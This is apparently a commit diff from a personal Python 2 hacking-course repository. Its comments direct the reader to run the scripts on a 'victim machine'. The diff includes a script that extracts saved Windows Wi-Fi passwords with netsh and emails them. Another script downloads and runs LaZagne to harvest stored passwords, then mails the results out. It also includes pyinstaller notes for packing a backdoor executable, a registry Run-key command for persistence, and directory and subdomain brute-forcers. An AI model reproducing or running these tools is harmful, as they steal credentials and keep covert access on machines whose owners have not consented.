Updated

Author: root

10 arpspoof_detector/arpspoof_detector.py

@@ -1,4 +1,7 @@
 #!/usr/bin/python2
+#put the script in startup folder to run when the system boots
+#put in /etc/init.d/script.py make executable sudo chmod 755 /etc/init.d/scipt.py
+#Register script to be run at startup sudo update-rc.d superscript defaults
 
 import scapy.all as scapy
 

11 execute_sys_cmd_report/report_windows_wifipassword_toemail.py renamed to 11 execute_sys_cmd_report/report_windows_wifi_password_to_email.py

@@ -1,4 +1,6 @@
 #!/usr/bin/python2.7
+#copy the script to victim machine this scripts should run on victim side windows_host 
+#get saved wifi password and send a gather information to the mail address mention in the script
 
 import subprocess
 import smtplib
@@ -18,9 +20,10 @@ def send_mail(email,password,message):
 
 result = ""
 for network_name in network_names_list:
-	command = "netsh wlan show profile" +network_name+" key=clear"
+	command = "netsh wlan show profile %s key=clear"%network_name
+	#to get each and every network saved in the system
 	current_result = subprocess.check_output(command,shell=True)
 	result = result + current_result
 
 
-send_mail("mail@gmail.com","password",result)
+send_mail("user@mail.com","password",result)

13 recover_saved_passwd_on_target/download_lazagne_execute_report_toemail.py renamed to 13 recover_saved_passwd_on_target/report_windows_saved_password_to_email.py

@@ -1,4 +1,9 @@
 #!/usr/bin/python2.7
+#The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer.
+#https://github.com/AlessandroZ/LaZagne  download this LaZagne file 
+#it works on Windows, linux, mac but in this script we use lazagne.exe to recover passwords
+#copy the script to victim machine this scripts should run on victim side windows_host 
+
 
 import requests
 import subprocess
@@ -26,6 +31,8 @@ def send_mail(email,password,message):
 temp_directory = tempfile.gettempdir()
 os.chdir(temp_directory)
 download("http://localhost where lazagne .exe is stored")
+#host lazagne.exe on webserver put that link to download the lazagne.exe or 
+#copy the lazagne.exe to victim and run his script in that path
 result = subprocess.check_output("lazagne.exe all",shell=True)
 send_mail("[email protected]","password",result)
 os.remove("lazagne.exe")

16 pyinstaller/pyinstaller.txt

@@ -1,6 +1,6 @@
 pyinstaller
 
-install pyinstaller to convert and pack all python code into 1 executable for the targetted operating system
+install pyinstaller to convert and pack all python code into 1 executable for the target operating system
 
 pip install pyinstaller 
 #for linux
@@ -29,7 +29,7 @@ subprocess.check_output(commmad,shell=True,stderr=subprocess.DEVNULL,stdin=subpr
 DEVNULL = open(os.devnull,"wb")
 subprocess.check_output(commmad,shell=True,stderr=DEVNULL,stdin=DEVNULL)
 
-To create a Python Executable it better to do that os environment
+To create a Python Executable it better to do in the same os environment similar to your target
 that is to run a py executable in windows 
 create the py exe in windows operating system with the required lib and modules is installed and then put the py exe in victim system to run
 
@@ -47,17 +47,12 @@ pip install in windows interpreter of linux
 
 ~/.wine/drive_c/Python27/wine python.exe -m pip install pyinstaller
 
+
+
 Maintain persistent by puting the script in startup when the os boot these scripts always gets loaded
 
 in windows Registry
 Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 
 in cmd prompt we can change value
-reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"
-
-Trojans
-
-Trojans is a file that looks and function like a normal file like image,pdf,song
-
-when the user clicks on it the image open on foreground and script run invisible in background
-
+reg add HKCV\Software\Microsoft\Windows\CurrentVersion\Run /v name /t REG_SZ /d "location of backdoor.exe"

17 crawler/common.txt renamed to 17 crawler/common_dir.txt

@@ -0,0 +1,32 @@
+#!/usr/bin/python2.7
+#discover hidden directory by bruteforceing common directory name 
+#if we get a respond then their is a directory then we also get the recursive of the directory.
+
+import requests
+
+def request(url):
+	try:
+		return requests.get("http://" + url)
+	except requests.exceptions.ConnectionError:
+		pass
+
+path=[]
+def dirdiscover(url):
+	with open("common_dir.txt","r") as wordlist_file:
+		for line in wordlist_file:
+			word = line.strip()
+			test_url = url + "/" + word
+			response = request(test_url)
+			if response :
+				print "[+] Discovered URL ----> " + test_url
+				path.append(word)
+
+url="192.168.44.101/mutillidae"
+#edit the url you want to scan
+dirdiscover(url)
+
+#recursively gothrough each and every path		
+for paths in path:
+	dirdiscover(url+"/"+ paths)
+
+

17 crawler/crawler_1.py

@@ -1,4 +1,6 @@
-#!/usr/bin/python
+#!/usr/bin/python2.7
+#dicover subdomains of domain by bruteforcing common sub domains to the domain and
+#if we get a respond then the sub-domain exist 
 
 import requests
 from datetime import datetime
@@ -12,20 +14,20 @@ def request(url):
 		pass
 
 target_url = "google.com"
-subdomain_list = []
+#subdomain_list = []
 file = open("googlesubdomain.txt","aw")
-with open("subdomain19","r") as wordlist_file:
+with open("top_10_subdomain.txt","r") as wordlist_file:
 	for line in wordlist_file:
 		word = line.strip()
 		test_url = word + "." + target_url
 		response = request(test_url)
 		if response :
 			print "[+] Discovered subdomain ----> "+test_url
-			subdomain_list.append(test_url)
+			#subdomain_list.append(test_url)
 			file.write(test_url+"\n")
 file.close()
 
 stop=datetime.now()
 
 totaltime=stop-start
-print "TotalTime = ",totaltime
+print "\n[***]TotalTimeTaken = ",totaltime